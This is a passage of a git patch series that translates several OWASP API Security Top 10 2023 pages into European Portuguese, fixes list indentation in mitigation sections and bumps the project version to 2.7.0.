[OWASP AppSec Conference][6] training sessions, or [join your local chapter][7]. | -| **Security Requirements** | Security should be part of every project from the beginning. 
When defining requirements, it is important to define what "secure" means for that project. OWASP recommends you use the [OWASP Application Security Verification Standard (ASVS)][8] as a guide for setting the security requirements. If you're outsourcing, consider the [OWASP Secure Software Contract Annex][9], which should be adapted according to local law and regulations. | -| **Security Architecture** | Security should remain a concern during all the project stages. The [OWASP Cheat Sheet Series][10] is a good starting point for guidance on how to design security in during the architecture phase. Among many others, you'll find the [REST Security Cheat Sheet][11] and the [REST Assessment Cheat Sheet][12] as well the [GraphQL Cheat Sheet][13]. | -| **Standard Security Controls** | Adopting standard security controls reduces the risk of introducing security weaknesses while writing your own logic. Although many modern frameworks now come with effective built-in standard controls, [OWASP Proactive Controls][14] gives you a good overview of what security controls you should look to include in your project. OWASP also provides some libraries and tools you may find valuable, such as validation controls. | -| **Secure Software Development Life Cycle** | You can use the [OWASP Software Assurance Maturity Model (SAMM)][15] to improve your processes of building APIs. Several other OWASP projects are available to help you during the different API development phases e.g., the [OWASP Code Review Guide][16]. | +| **Educação** | The [Application Security Wayfinder][2] should give you a good idea about what projects are available for each stage/phase of the Software Development LifeCycle (SDLC). For hands-on learning/training you can start with [OWASP **crAPI** - **C**ompletely **R**idiculous **API**][3] or [OWASP Juice Shop][4]: both have intentionally vulnerable APIs. 
The [OWASP Vulnerable Web Applications Directory Project][5] provides a curated list of intentionally vulnerable applications: you'll find there several other vulnerable APIs. You can also attend [OWASP AppSec Conference][6] training sessions, or [join your local chapter][7]. | +| **Requisitos de Segurança** | Security should be part of every project from the beginning. When defining requirements, it is important to define what "secure" means for that project. OWASP recommends you use the [OWASP Application Security Verification Standard (ASVS)][8] as a guide for setting the security requirements. If you're outsourcing, consider the [OWASP Secure Software Contract Annex][9], which should be adapted according to local law and regulations. | +| **Arquitetura de Segurança** | Security should remain a concern during all the project stages. The [OWASP Cheat Sheet Series][10] is a good starting point for guidance on how to design security in during the architecture phase. Among many others, you'll find the [REST Security Cheat Sheet][11] and the [REST Assessment Cheat Sheet][12] as well the [GraphQL Cheat Sheet][13]. | +| **Controlos Standard de Segurança** | Adopting standard security controls reduces the risk of introducing security weaknesses while writing your own logic. Although many modern frameworks now come with effective built-in standard controls, [OWASP Proactive Controls][14] gives you a good overview of what security controls you should look to include in your project. OWASP also provides some libraries and tools you may find valuable, such as validation controls. | +| **Ciclo de Desenvolvimento de Software Seguro** | You can use the [OWASP Software Assurance Maturity Model (SAMM)][15] to improve your processes of building APIs. Several other OWASP projects are available to help you during the different API development phases e.g., the [OWASP Code Review Guide][16]. 
| [1]: https://owasp.org/projects/ [2]: https://owasp.org/projects/#owasp-projects-the-sdlc-and-the-security-wayfinder From 000683323be50e7155ea85a25c7e83de0689f5e1 Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Sun, 3 Nov 2024 07:58:53 +0000 Subject: [PATCH 56/64] Update 0xb0-next-devs.md --- editions/2023/pt-pt/0xb0-next-devs.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/editions/2023/pt-pt/0xb0-next-devs.md b/editions/2023/pt-pt/0xb0-next-devs.md index 2de735d76..76c38f98c 100644 --- a/editions/2023/pt-pt/0xb0-next-devs.md +++ b/editions/2023/pt-pt/0xb0-next-devs.md 
@@ -14,11 +14,11 @@ consulta da lista dos projetos existentes. | | | |-|-| -| **Educação** | The [Application Security Wayfinder][2] should give you a good idea about what projects are available for each stage/phase of the Software Development LifeCycle (SDLC). For hands-on learning/training you can start with [OWASP **crAPI** - **C**ompletely **R**idiculous **API**][3] or [OWASP Juice Shop][4]: both have intentionally vulnerable APIs. The [OWASP Vulnerable Web Applications Directory Project][5] provides a curated list of intentionally vulnerable applications: you'll find there several other vulnerable APIs. You can also attend [OWASP AppSec Conference][6] training sessions, or [join your local chapter][7]. | -| **Requisitos de Segurança** | Security should be part of every project from the beginning. When defining requirements, it is important to define what "secure" means for that project. OWASP recommends you use the [OWASP Application Security Verification Standard (ASVS)][8] as a guide for setting the security requirements. If you're outsourcing, consider the [OWASP Secure Software Contract Annex][9], which should be adapted according to local law and regulations. | -| **Arquitetura de Segurança** | Security should remain a concern during all the project stages. The [OWASP Cheat Sheet Series][10] is a good starting point for guidance on how to design security in during the architecture phase. Among many others, you'll find the [REST Security Cheat Sheet][11] and the [REST Assessment Cheat Sheet][12] as well the [GraphQL Cheat Sheet][13]. | -| **Controlos Standard de Segurança** | Adopting standard security controls reduces the risk of introducing security weaknesses while writing your own logic. Although many modern frameworks now come with effective built-in standard controls, [OWASP Proactive Controls][14] gives you a good overview of what security controls you should look to include in your project. 
OWASP also provides some libraries and tools you may find valuable, such as validation controls. | -| **Ciclo de Desenvolvimento de Software Seguro** | You can use the [OWASP Software Assurance Maturity Model (SAMM)][15] to improve your processes of building APIs. Several other OWASP projects are available to help you during the different API development phases e.g., the [OWASP Code Review Guide][16]. | +| **Educação** | O [Application Security Wayfinder][2] deve oferecer uma boa ideia sobre quais projetos estão disponíveis para cada etapa/fase do Ciclo de Vida do Desenvolvimento de Software (SDLC). Para aprendizagem prática/treino, pode começar com [OWASP **crAPI** - **C**ompletely **R**idiculous **API**][3] ou [OWASP Juice Shop][4]: ambos possuem APIs intencionalmente vulneráveis. O [OWASP Vulnerable Web Applications Directory Project][5] fornece uma lista curada de aplicações intencionalmente vulneráveis: lá encontrará várias outras APIs vulneráveis. Também pode participar em sessões de treino da [OWASP AppSec Conference][6] ou [juntar-se ao seu chapter local][7]. | +| **Requisitos de Segurança** | A segurança deve fazer parte de qualquer projeto desde o início. É importante que, durante a fase de identificação de requisitos, seja definido o que é que “seguro” significa no contexto desse projeto. A OWASP recomenda a utilização do [OWASP Application Security Verification Standard (ASVS)][8] como guia para definir os requisitos de segurança. Se estiver a subcontratar, considere ao invés a utilização do [OWASP Secure Software Contract Annex][9], o qual deverá adaptar às leis e regulamentações locais. | +| **Arquitetura de Segurança** | A segurança deve ser uma preocupação durante todas as fases dum projeto. O projeto [OWASP Prevention Cheat Sheets][10] é um bom ponto inicial de orientação sobre como contemplar a segurança durante a fase de arquitetura. 
Entre outros, o [REST Security Cheat Sheet][11] e o [REST Assessment Cheat Sheet][12] serão seguramente relevantes, como também o [GraphQL Cheat Sheet][13]. | +| **Controlos Standard de Segurança** | A adoção de controlos standard de segurança reduzem o risco de introdução de falhas de segurança durante a implementação da lógica de negócio. Apesar de muitas _frameworks_ modernas já incluírem controlos standard, o projeto [OWASP Proactive Controls][14] dá-lhe uma boa visão sobre que controlos de segurança deve incluir no seu projeto. A OWASP também disponibiliza algumas bibliotecas e ferramentas que pode achar úteis, tais como controlos de validação. | +| **Ciclo de Desenvolvimento de Software Seguro** | Pode usar o [OWASP Software Assurance Maturity Model (SAMM)][15] para melhorar o processo de desenvolvimento de APIs. Tem ainda disponíveis vários outros projetos OWASP para o ajudar durante as várias fases de desenvolvimento de APIs, por exemplo o [OWASP Code Review Guide][16]. | [1]: https://owasp.org/projects/ [2]: https://owasp.org/projects/#owasp-projects-the-sdlc-and-the-security-wayfinder From 1c738f2a483241d40e0476fce7c2586172e83e75 Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Sun, 3 Nov 2024 08:24:45 +0000 Subject: [PATCH 57/64] Update 0xb1-next-devsecops.md --- editions/2023/pt-pt/0xb1-next-devsecops.md | 31 +++++++++++----------- 1 file changed, 16 insertions(+), 15 deletions(-) diff --git a/editions/2023/pt-pt/0xb1-next-devsecops.md b/editions/2023/pt-pt/0xb1-next-devsecops.md index 7cf75e87d..750715bed 100644 --- a/editions/2023/pt-pt/0xb1-next-devsecops.md +++ b/editions/2023/pt-pt/0xb1-next-devsecops.md 
@@ -1,24 +1,25 @@ -# What's Next For DevSecOps +# O que Se Segue Para DevSecOps -Due to their importance in modern application architectures, building secure -APIs is crucial. Security cannot be neglected, and it should be part of the -whole development life cycle. Scanning and penetration testing yearly are no -longer enough. +Dada a sua importância na arquitetura das aplicações modernas, desenvolver APIs +seguras é crucial. A segurança não pode ser negligenciada e deve estar presente +durante todo o clico de vida do desenvolvimento. Já não basta a execução de +_scanners_ ou a realização de testes de penetração anualmente. -DevSecOps should join the development effort, facilitating continuous security -testing across the entire software development life cycle. Your goal should be -to enhance the development pipeline with security automation, but without -impacting the speed of development. +A equipa de DevSecOps deve fazer parte do esforço de desenvolvimento +contribuindo para a realização de testes de segurança, de forma continuada, +durante todo o ciclo de vida do desenvolvimento. Deve ter como objetivo melhorar +a _pipeline_ de desenvolvimento com automação de segurança e sem influenciar +negativamente o ritmo do desenvolvimento. -In case of doubt, stay informed, and refer to the [DevSecOps Manifesto][1]. +Em caso de dúvida mantenha-se informado e reveja o [Manifesto DevSecOps][1]. | | | |-|-| -| **Understand the Threat Model** | Testing priorities come from a threat model. If you don't have one, consider using [OWASP Application Security Verification Standard (ASVS)][2], and the [OWASP Testing Guide][3] as an input. Involving the development team will help to make them more security-aware. | -| **Understand the SDLC** | Join the development team to better understand the Software Development Life Cycle. Your contribution on continuous security testing should be compatible with people, processes, and tools. 
Everyone should agree with the process, so that there's no unnecessary friction or resistance. | -| **Testing Strategies** | Since your work should not impact the development speed, you should wisely choose the best (simple, fastest, most accurate) technique to verify the security requirements. The [OWASP Security Knowledge Framework][4] and [OWASP Application Security Verification Standard][2] can be great sources of functional and nonfunctional security requirements. There are other great sources for [projects][5] and [tools][6] similar to the one offered by the [DevSecOps community][7]. | -| **Achieving Coverage and Accuracy** | You're the bridge between developers and operations teams. To achieve coverage, not only should you focus on the functionality, but also the orchestration. Work close to both development and operations teams from the beginning so you can optimize your time and effort. You should aim for a state where the essential security is verified continuously. | -| **Clearly Communicate Findings** | Contribute value with less or no friction. Deliver findings in a timely fashion, within the tools development teams are using (not PDF files). Join the development team to address the findings. Take the opportunity to educate them, clearly describing the weakness and how it can be abused, including an attack scenario to make it real. | +| **Compreenda o Modelo de Ameaças** | As prioridades relativamente ao que deve ser testado têm origem no modelo de ameaças. Se não tem um, considere usar o [OWASP Application Security Verification Standard (ASVS)][2] e o [OWASP Testing Guide][3] como base. Envolver a equipa de desenvolvimento na elaboração do modelo de ameaças pode torná-la mais consciente para questões relacionadas com segurança. | +| **Compreenda o Ciclo de Vida do Desenvolvimento do Software** | Reúna a equipa de desenvolvimento para melhor compreender o ciclo de vida do desenvolvimento do software. 
O seu contributo para a realização continua de testes de segurança deve ser compatível com as pessoas, processos e ferramentas. Todos devem concordar com o processo, de forma a não provocar atrito ou resistência desnecessários. | +| **Estratégias de Teste** | Sendo que o seu trabalho não deve condicionar o ritmo de desenvolvimento, deverá escolher cuidadosamente a melhor (mais simples, rápida e precisa) técnica para verificar os requisitos de segurança. A [OWASP Security Knowledge Framework][4] e o [OWASP Application Security Verification Standard][2] podem ser importantes fontes de requisitos de segurança funcionais e não-funcionais. Existem outras fontes relevantes onde poderá encontrar [projetos][5] e [ferramentas][6] como aquelas disponibilizadas pela [comunidade DevSecOps][7]. | +| **Procure Alcançar Cobertura e Precisão** | Você é a ponte entre as equipas de desenvolvimento e operações. Para alcançar cobertura, deve não só focar-se na funcionalidade, mas também na orquestração. Trabalhe junto de ambas as equipas desde o início por forma a otimizar o seu tempo e esforço. Deve almejar um estado em que o essencial da segurança é verificado de forma continua. | +| **Comunique as Falhas de Forma Clara** | Entregue valor evitando qualquer atrito. Comunique as falhas identificadas atempadamente, usando as ferramentas que a equipa de desenvolvimento já utiliza (e não através de ficheiros PDF). Junte-se à equipa de desenvolvimento para resolver as falhas identificadas. Aproveite a oportunidade para educar os elementos da equipa de desenvolvimento, descrevendo de forma clara a falha e como esta pode ser abusada, incluindo um cenário de ataque para a tornar mais real. | [1]: https://www.devsecops.org/ [2]: https://owasp.org/www-project-application-security-verification-standard/ From 275be74f00eb6b0c76576f1b6de7a65ce98ca198 Mon Sep 17 00:00:00 2001 
From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com>
Date: Sun, 3 Nov 2024 09:09:16 +0000
Subject: [PATCH 58/64] Update 0xd0-about-data.md
---
editions/2023/pt-pt/0xd0-about-data.md | 132 +++++++++++++------------
1 file changed, 67 insertions(+), 65 deletions(-)
diff --git a/editions/2023/pt-pt/0xd0-about-data.md b/editions/2023/pt-pt/0xd0-about-data.md
index 3e856f718..90919b3a8 100644
--- a/editions/2023/pt-pt/0xd0-about-data.md
+++ b/editions/2023/pt-pt/0xd0-about-data.md
@@ -1,68 +1,70 @@ -# Methodology and Data - -## Overview - -For this list update, the OWASP API Security team used the same methodology used -for the successful and well adopted 2019 list, with the addition of a 3 month -[public Call for Data][1]. Unfortunately, this call for data did not result in -data that would have enabled a relevant statistical analysis of the most common -API security issues. - -However, with a more mature API security industry capable of providing direct -feedback and insights, the update process moved forward using the same -methodology as before. - -Arrived here, we believe to have a good forward-looking awareness document for -the next three or four years, more focused on modern APIs-specific issues. The -goal of this project isn't to replace other top 10 lists, but instead to cover -the existing and upcoming top API security risks that we believe the industry -should be aware and diligent about. - -## Methodology - -In the first phase, publicly available data about API security incidents were -collected, reviewed, and categorized. Such data were collected from bug bounty -platforms and publicly available reports. Only issues reported between 2019 and -2022 were considered. This data was used to give the team a sense of in which -direction the previous top 10 list should evolve as well as to help deal with -possible contributed data bias. - -A public [Call for Data][1] ran from September 1st and November 30th, 2022. In -parallel the project team started the discussion about what has changed since -2019. The discussion included the impact of the first list, feedback received -from the community, and new trends of API security. - -The project team promoted meetings with specialists on relevant API security -threats to get insights into how victims are impacted and how those threats can -be mitigated. - -This effort resulted in an initial draft of what the team believes were the ten -most critical API security risks. 
The [OWASP Risk Rating Methodology][2] was -used to perform the risk analysis. Prevalence ratings were decided from a -consensus among the project team members, based on their experience in the -field. For considerations on these matters, please refer to the [API Security -Risks][3] section. - -The initial draft was then shared for review with security practitioners with -relevant experience in the API security fields. Their comments were reviewed, -discussed, and when applicable included in the document. The resulting document -was [published as a Release Candidate][4] for [open discussion][5]. Several -[community contributions][6] were included into the final document. - -The list of contributors is available in the [Acknowledgments][7] section. - -## API Specific Risks - -The list is built to address security risks that are more specific to APIs. - -It does not imply that other generic application security risks don't exist in -API based applications. For example, we didn't include risks such as "Vulnerable -and Outdated Components" or "Injection", even though you might find them in API -based applications. These risks are generic, they don't behave differently in -APIs, nor their exploitation is different. - -Our goal is to increase the awareness of security risks that deserve special -attention in APIs. +# Metodologia e Dados + +## Preâmbulo + +Para esta atualização da lista, a equipa de Segurança de API da OWASP utilizou a +mesma metodologia adotada com sucesso para a lista de 2019, com a adição de um +[Pedido Público por Dados][1] de 3 meses. Infelizmente, este pedido não resultou +em dados que permitissem uma análise estatística relevante sobre os problemas de +segurança de API mais comuns. + +Contudo, com uma indústria de segurança de API mais madura e capaz de fornecer +feedback e informações diretamente, o processo de atualização avançou usando a +mesma metodologia de antes. 
+ +Chegados a este ponto, acreditamos ter um bom documento de consciencialização +para os próximos três ou quatro anos, mais focado nas questões específicas das +APIs modernas. O objetivo deste projeto não é substituir outras listas de top +10, mas sim cobrir os principais riscos de segurança de API atuais e emergentes, +sobre os quais acreditamos que a indústria deve estar atenta e ser diligente. + +## Metodologia + +Na primeira fase, dados publicamente disponíveis sobre incidentes de segurança +em APIs foram recolhidos, revistos e categorizados. Esses dados foram obtidos de +plataformas de _bug bounty_ e relatórios públicos. Apenas problemas reportados +entre 2019 e 2022 foram considerados. Esses dados ajudaram a equipa a entender +em que direção a lista de top 10 anterior deveria evoluir, assim como a lidar +com possíveis vieses dos dados contribuídos. + +Um [Pedido Público por Dados][1] foi realizado de 1 de Setembro a 30 de Novembro +de 2022. Em paralelo, a equipa do projeto iniciou a discussão sobre o que mudou +desde 2019. A discussão incluiu o impacto da primeira lista, o feedback recebido +da comunidade e novas tendências na segurança de APIs. + +A equipa do projeto promoveu reuniões com especialistas sobre ameaças relevantes +à segurança de APIs para obter informações sobre como as vítimas são impactadas +e como essas ameaças podem ser mitigadas. + +Este esforço resultou num rascunho inicial do que a equipa acredita serem os dez +riscos mais críticos de segurança para APIs. A [Metodologia de Classificação de +Risco da OWASP][2] foi utilizada para realizar a análise de riscos. As +classificações de prevalência foram decididas por consenso entre os membros da +equipa do projeto, com base na sua experiência na área. Para considerações sobre +esses temas, consulte a secção [Riscos de Segurança em APIs][3]. + +O rascunho inicial foi então compartilhado para revisão com profissionais de +segurança com experiência relevante na área de segurança de APIs. 
Os seus +comentários foram analisados, discutidos e, quando aplicável, incluídos no +documento. O documento resultante foi [publicado como uma Versão Candidata][4] +para [discussão aberta][5]. Várias [contribuições da comunidade][6] foram +incorporadas no documento final. + +A lista de contribuidores está disponível na secção de [Agradecimentos][7]. + +## Riscos Específicos de APIs + +A lista foi elaborada para abordar riscos de segurança que são mais específicos +para APIs. + +Não implica que outros riscos genéricos de segurança de aplicações não existam +em aplicações baseadas em APIs. Por exemplo, não incluímos riscos como +"Componentes Vulneráveis e Desatualizados" ou "Injeção", embora você possa +encontrá-los em aplicações baseadas em APIs. Esses riscos são genéricos, não se +comportam de forma diferente em APIs, nem a sua exploração é diferente. + +O nosso objetivo é aumentar a conscientização sobre os riscos de segurança que +merecem atenção especial em APIs. [1]: https://owasp.org/www-project-api-security/announcements/cfd/2022/ [2]: https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology From 2e9e5cd19b23a0d6313a886d4308d6a212e17d68 Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Sun, 3 Nov 2024 09:09:50 +0000 Subject: [PATCH 59/64] Update 0xb1-next-devsecops.md --- editions/2023/pt-pt/0xb1-next-devsecops.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/editions/2023/pt-pt/0xb1-next-devsecops.md b/editions/2023/pt-pt/0xb1-next-devsecops.md index 750715bed..44b5284cb 100644 --- a/editions/2023/pt-pt/0xb1-next-devsecops.md +++ b/editions/2023/pt-pt/0xb1-next-devsecops.md @@ -1,4 +1,4 @@ -# O que Se Segue Para DevSecOps +# O Que Se Segue Para DevSecOps Dada a sua importância na arquitetura das aplicações modernas, desenvolver APIs seguras é crucial. A segurança não pode ser negligenciada e deve estar presente From 6d6e62cb84ed641468ea4fff6709e3d2148e5918 Mon Sep 17 00:00:00 2001 
From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com>
Date: Sun, 3 Nov 2024 09:13:38 +0000
Subject: [PATCH 60/64] Update 0xa6-unrestricted-access-to-sensitive-business-flows.md
---
...cted-access-to-sensitive-business-flows.md | 38 +++++++++----------
1 file changed, 19 insertions(+), 19 deletions(-)
diff --git a/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md b/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md
index e419ed906..e20a5553c 100644
--- a/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md
+++ b/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md
@@ -81,25 +81,25 @@ O planeamento da mitigação deve ser feito em duas camadas: * Engenharia - escolher os mecanismos de proteção adequados para mitigar o risco empresarial. - Alguns dos mecanismos de proteção são mais simples, enquanto outros são mais - difíceis de implementar. Os seguintes métodos são utilizados para desacelerar - ameaças automatizadas: - - * _Fingerprinting_ de dispositivos: negar serviço a dispositivos de cliente - inesperados (e.g. navegadores _headless_) tende a fazer com que os atacantes - usem soluções mais sofisticadas, tornando-as mais caras para eles. - * Deteção humana: utilize _captcha_ ou soluções biométricas mais avançadas - (e.g. padrões de digitação). - * Padrões não humanos: analisar o fluxo do utilizador para detetar padrões - não humanos (e.g. o utilizador acedeu às funções "adicionar ao carrinho" e - "finalizar compra" em menos de um segundo). - * Considere bloquear endereços IP de nós de saída da rede Tor e proxies bem - conhecidos. - - Proteja e limite o acesso às APIs que são consumidas diretamente por máquinas - (como APIs para desenvolvedores e B2B). Elas tendem a ser um alvo fácil para - atacantes, pois muitas vezes não implementam todos os mecanismos de proteção - necessários. + Alguns dos mecanismos de proteção são mais simples, enquanto outros são mais + difíceis de implementar. Os seguintes métodos são utilizados para desacelerar + ameaças automatizadas: + + * _Fingerprinting_ de dispositivos: negar serviço a dispositivos de cliente + inesperados (e.g. navegadores _headless_) tende a fazer com que os atacantes + usem soluções mais sofisticadas, tornando-as mais caras para eles. + * Deteção humana: utilize _captcha_ ou soluções biométricas mais avançadas + (e.g. padrões de digitação). + * Padrões não humanos: analisar o fluxo do utilizador para detetar padrões + não humanos (e.g. o utilizador acedeu às funções "adicionar ao carrinho" e + "finalizar compra" em menos de um segundo). 
+ * Considere bloquear endereços IP de nós de saída da rede Tor e proxies bem + conhecidos. + + Proteja e limite o acesso às APIs que são consumidas diretamente por máquinas + (como APIs para desenvolvedores e B2B). Elas tendem a ser um alvo fácil para + atacantes, pois muitas vezes não implementam todos os mecanismos de proteção + necessários. ## Referências From f87e9b93afd358685f040952758ae84a3317187f Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Sun, 3 Nov 2024 09:14:23 +0000 Subject: [PATCH 61/64] Update 0xa7-server-side-request-forgery.md --- editions/2023/pt-pt/0xa7-server-side-request-forgery.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/editions/2023/pt-pt/0xa7-server-side-request-forgery.md b/editions/2023/pt-pt/0xa7-server-side-request-forgery.md index c40de1574..ea8d7ffac 100644 --- a/editions/2023/pt-pt/0xa7-server-side-request-forgery.md +++ b/editions/2023/pt-pt/0xa7-server-side-request-forgery.md @@ -135,10 +135,10 @@ visualizar as credenciais do ambiente de nuvem. * Isole o mecanismo de obtenção de recursos na sua rede: geralmente, essas funcionalidades são destinadas a recuperar recursos remotos e não internos. * Sempre que possível, utilize listas de permissões de: - * Origens remotas das quais se espera que os utilizadores façam download de - recursos (por exemplo, Google Drive, Gravatar, etc.) - * Esquemas de URL e portas - * Tipos de media aceites para uma determinada funcionalidade + * Origens remotas das quais se espera que os utilizadores façam download de + recursos (por exemplo, Google Drive, Gravatar, etc.) + * Esquemas de URL e portas + * Tipos de media aceites para uma determinada funcionalidade * Desative redirecionamentos HTTP. * Utilize um URL _parser_ bem testado e mantido para evitar problemas causados por inconsistências no processamento de URLs. From 966d61408daea85fa9465155ca59ddeafa47f45a Mon Sep 17 00:00:00 2001 
From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Sun, 3 Nov 2024 09:14:52 +0000 Subject: [PATCH 62/64] Update 0xa8-security-misconfiguration.md --- editions/2023/pt-pt/0xa8-security-misconfiguration.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/editions/2023/pt-pt/0xa8-security-misconfiguration.md b/editions/2023/pt-pt/0xa8-security-misconfiguration.md index 0ac606783..c1a7a3bee 100644 --- a/editions/2023/pt-pt/0xa8-security-misconfiguration.md +++ b/editions/2023/pt-pt/0xa8-security-misconfiguration.md @@ -88,9 +88,9 @@ E ainda: outros verbos HTTP devem ser desativados (por exemplo, HEAD). * As APIs que esperam ser acedidas a partir de clientes baseados em navegador (por exemplo, aplicação web _front-end_) devem, pelo menos: - * implementar uma política adequada de Partilha de Recursos entre Origens - (CORS). - * incluir os Cabeçalhos de Segurança aplicáveis. + * implementar uma política adequada de Partilha de Recursos entre Origens + (CORS). + * incluir os Cabeçalhos de Segurança aplicáveis. * Restrinja os tipos de conteúdo/formatos de dados recebidos àqueles que cumprem os requisitos funcionais/de negócio. * Assegure que todos os servidores na cadeia de servidores HTTP (por exemplo, From 779ed5c357ac5e4f2b5ae5a4573954a68d23e5ec Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Sun, 3 Nov 2024 09:15:42 +0000 Subject: [PATCH 63/64] Update 0xa9-improper-inventory-management.md --- .../pt-pt/0xa9-improper-inventory-management.md | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/editions/2023/pt-pt/0xa9-improper-inventory-management.md b/editions/2023/pt-pt/0xa9-improper-inventory-management.md index 6a6c1ca12..bad6bdece 100644 --- a/editions/2023/pt-pt/0xa9-improper-inventory-management.md +++ b/editions/2023/pt-pt/0xa9-improper-inventory-management.md 
@@ -19,11 +19,11 @@ Uma API tem um "ponto cego de documentação" se: * O propósito de um _host_ da API é pouco claro e não há respostas explícitas para as seguintes perguntas: - * Em que ambiente está a API a ser executada (por exemplo, produção, - _staging_, teste, desenvolvimento)? - * Quem deve ter acesso à rede da API (por exemplo, público, interno, - parceiros)? - * Qual versão da API está em execução? + * Em que ambiente está a API a ser executada (por exemplo, produção, + _staging_, teste, desenvolvimento)? + * Quem deve ter acesso à rede da API (por exemplo, público, interno, + parceiros)? + * Qual versão da API está em execução? * Não existe documentação ou a documentação existente não está atualizada. * Não existe um plano de desativação para cada versão da API. * O inventário do _host_ está em falta ou desatualizado. @@ -36,9 +36,9 @@ Uma API tem um "ponto cego de fluxo de dados" se: * Existe um "fluxo de dados sensíveis" onde a API compartilha dados sensíveis com um terceiro e - * Não existe uma justificação de negócio ou aprovação do fluxo - * Não existe inventário ou visibilidade do fluxo - * Não há visibilidade detalhada sobre o tipo de dados sensíveis partilhados + * Não existe uma justificação de negócio ou aprovação do fluxo + * Não existe inventário ou visibilidade do fluxo + * Não há visibilidade detalhada sobre o tipo de dados sensíveis partilhados ## Exemplos de Cenários de Ataque From afd84573a04c15599a533ac29ffb9290aa1c61fb Mon Sep 17 00:00:00 2001 From: PauloASilva Date: Tue, 31 Dec 2024 12:00:49 +0000 Subject: [PATCH 64/64] Bump version to 2.7.0 --- VERSION | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/VERSION b/VERSION index 914ec9671..9aa34646d 100644 --- a/VERSION +++ b/VERSION @@ -1 +1 @@ -2.6.0 \ No newline at end of file +2.7.0 \ No newline at end of file